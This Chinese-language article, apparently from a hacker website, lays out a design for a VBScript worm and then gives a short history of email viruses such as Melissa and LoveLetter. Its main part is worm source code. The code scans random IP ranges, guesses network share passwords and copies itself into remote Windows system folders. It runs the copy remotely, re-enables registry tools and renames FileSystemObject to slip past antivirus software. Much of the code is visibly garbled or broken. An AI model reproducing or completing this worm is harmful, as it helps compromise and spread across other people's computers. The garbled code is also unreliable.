网络安全 频道

对超级脚本病毒的构思

3,病毒利用邮件和局域网进性传播: 

攻击局域网可以采用简化的network代码,并利用vmi直接在远程主机上运行病毒体,且可以破译共享密码(穷解太费时间,没什么必要): 
Sub netshare() 
Dim o1,o2,o3,o4,rand,dot,count,name,driveconnected, pwd,strings ,k 
count = "0" 
dot = "." 
driveconnected="0" 
set yu=createobject("scrip"+"ting."+"filesyst"+"emob"+"ject") 
set net=createobject("wsc"+"ript.n"+"etwork") 
set qq=createobject("WSc"+"ript.S"+"hell") 
on error resume next 
randomize 
randaddress() 

do 
do while driveconnected ="0" 
checkadress() 
sharename() 
pwd = "" 
pqd = "" 
strings = "0123456789abcdefghijklmnopqrstuvwxyz"  
For k = 1 to len(strings) step 1  
net.mapnetworkdrive "I:", "\\" & "name" &"\C" , "& pwd & mid(strings,k,1)" , "& pqd & mid(strings,k,1)" 
If instr(net.Body, Wrong) <> 0 Then  
pwd = pwd & mid(strings,k,1)  
End If  
Next  
’破译共享密码 
enumdrives() 
loop 
copy() 
disconnectdrive() 
qq "\\name\con\con",0 
run () 
loop 
end sub 

function run() 
Dim Controller, RemoteScript 
Set Controller = WScript.CreateObject("WSHC"+"ontroller") 
Set RemoteScript = Controller.CreateScript("system.vbe", "name") 
WScript.ConnectObject RemoteScript, "remote_" 
RemoteScript.Execute 

Do While RemoteScript.Status <> 2  
WScript.Sleep 100 
Loop 

WScript.DisconnectObject RemoteScript 
remote_Error() 
end function 

Sub remote_Error 
Dim theError 
Set theError = RemoteScript.Error 
WScript.Echo "Error " & theError.Number & " - Line: " & theError.Line & ", Char: " & theError.Character & vbCrLf & "Description: " & theError.Description 
WScript.Quit -1 
End Sub 

Function disconnectdrive() 
net.removenetworkdrive "I:" 
driveconnected = "0" 
end function 

Function copy() 
yu.copyfile dir2&"\system.vbe", "I:\
windows\" 
yu.copyfile dir2&"\system.vbe", "I:\
windows\system32\" 
yu.copyfile dir2&"\system.vbe", "I:\winnt\system32\" 
yu.copyfile dir2&"\system.inf", "I:\winnt\system32\" 
yu.copyfile dir2&"\system.inf", "I:\
windows\system32\" 
’复制到对方的机器上。 
end function  

Function checkaddress() 
o4 = o4 +1 
if o4 = "255" then randaddress() 
end function 

Function sharename() 
name = " octa & dot & octb & dot & octc & dot & octd " 
end function 

Function enumdrives() 
set you=net.enumnetworkdrives 
For p = 0 to you.Count -1 
if name = you.item(p) then 
driveconnected = 1 
else 
driveconnected = 0 
end if 
Next 
end function 

Function randum() 
rand = int((254 * rnd) + 1) 
end function 

Function randaddress() 
if count < 50 then 
o1=Int((16) * Rnd + 199) 
coun=count + 1 
else 
randum() 
o1=rand 
end if 
randum() 
o2=rand 
randum() 
o3=rand 
o4="1" 
end function 

4,有些
Windows的高级用户为了防范脚本病毒,把注册表中的filesystemobject项给删掉了,新的蠕虫将在执行的开始, 
检查系统的filesystemobject项是否存在,如果不存在的话,将重新写入filesystemobject项,当然你也可以将其换个名称,这样有些 
杀毒软件就不一定认识了, 
On Error Resume Next 
Set wa=CreateObject("WSc"+"ript.S"+"hell") 
tt=wa.RegRead("HKCU\Software\Microsoft\
Windows\CurrentVersion\Policies\System\DisableRegistryTools") 
if tt=1 then  
wa.RegWrite "HKCU\Software\Microsoft\
Windows\CurrentVersion\Policies\System\DisableRegistryTools", 00000000, "REG_DWORD" 
end if 
uu=wa.RegRead("HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}")  
if uu="" then 
uu.RegWrite "HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}" , "FileSystemObject", "REG_SZ" 
end if 
或者 
a.regdelete "HKEY_CLASSES_ROOT\Scripting.FileSystemObject\CLSID\" 
a.regdelete "HKEY_CLASSES_ROOT\Scripting.FileSystemObject\" 
a.regwrite "HKEY_CLASSES_ROOT\wangzhitong\", "FileSystem Object", "REG_SZ" 
a.regwrite "HKEY_CLASSES_ROOT\wangzhitong\CLSID\", "{0D43FE01-F093-11CF-8940-00A0C9054228}", "REG_SZ" 
set yu=createobject("wangzhitong") 
以后系统内的filesystemobject项就被替换成了wangzhitong. 

6,自己写好的蠕虫怎能让其他的蠕虫一起存在一个系统中呢,所以要劲可能的消灭其他的病毒程序。当然你要先分析那些病毒程序,只要清除掉他们就行了。 

-------------------------------------------------------------------------------------------- 


简单的从别的地方复制了一些计算机病毒历史记录给大家参考 

1999/3/,一个名为“梅丽莎”(Melissa)的计算机病毒席卷欧、美各国的计算机网络。这种病毒利用邮件系统大量复制、传播, 
造成网络阻塞,甚至瘫痪。并且,这种病毒在传播过程中,还会造成泄密。 

2000/5/:“爱虫”(LoveLetter)病毒出现。“爱虫”病毒是一种脚本病毒,它通过微软的电子邮件系统进行传播。这一病毒的邮件主题为“I Love You”,包含一个附件“Love-Letter-for-you.txt.vbs”,一旦在微软电子邮件中打开这个附件,系统就会自动复制并向用户通讯簿中所有的电子邮件地址发送这一病毒,其传播速度比“梅莉沙”病毒还要快好几倍。 

2001/1/21  
一种变形的“梅丽莎”病毒侵袭麦金塔(Macintosh)电脑。这种病毒能感染Mac文件, 
病毒产生的大量电子邮件可以堵塞服务器,修改微软Word程序的设置,感染文件和模板。 
携带这种“梅丽莎”病毒的电子邮件附件名叫“Anniv.DOC”。这是这种类型的病毒第一次将矛头指向了麦金塔电脑。  

2001/2/15  
荷兰警方13日逮捕了一名自称发明了“库尔尼科娃”电脑病毒的20岁男子。此人要面临坐牢4年的处罚。 
通过电子邮件传播的“库尔尼科娃”病毒12日在欧洲、美洲和亚洲发作,大量垃圾邮件积压在电子邮件系统内, 
系统速度明显变慢,有的公司干脆关闭了电子邮件系统。这名荷兰男子自称是19岁的俄罗斯网球女星安娜·库尔尼科娃的球迷 
这个病毒的作者说,他不是编程专家,不过是从互联网上下载了病毒,然后编写程序完成的。 

2001/5/6  
一种新的恶性电脑病毒“欢乐时光”(Happytime/VBSHappytime.A.Worm)已在中国开始传播。 
“欢乐时光”病毒很可能是一种国产病毒,它是类似“爱虫”的蠕虫类病毒。用户通过美国微软公司办公套件(Outlook) 
收取带有“欢乐时光”病毒的邮件时,无论用户是否打开邮件,只要鼠标指向带毒的邮件,“欢乐时光”病毒即被激活, 
随后立即传染硬盘中的文件。感染“欢乐时光”病毒后,如果电脑时钟的日期和月份之和为13, 
则该病毒将逐步删除硬盘中的EXE和Dll文件,最后导致系统瘫痪。  

2001/5/11 

新病毒“主页”正在全球传播,这种被称作“HomePage”的病毒被看作是“库尔尼科娃”病毒的“远亲”。携带这种电脑病毒的邮件题目为“主页”,邮件正文写道:“嗨,你应该看看这个网页,它确实很酷。”邮件中夹带着一个名为“HOMEPAGE.HTML.VBS”的附件。用户一旦打开附件,病毒第一步先自我复制,并向微软Outlook地址簿中的每一个地址发去一封携毒邮件。然后搜索Outlook收件箱,将其中名为“主页”的信件统统删除,同时打开数个色情网页。值得庆幸的是,上述病毒没有造成太大的破坏,不到1万台电脑受此影响陷入了瘫痪。由于时差的关系,美国地区的防病毒公司在接到来自东半球的消息后,对病毒加以防范,成功抵制了病毒进一步扩散.

http://www.hack58.net/Article/60/64/2005/5764.htm

0
相关文章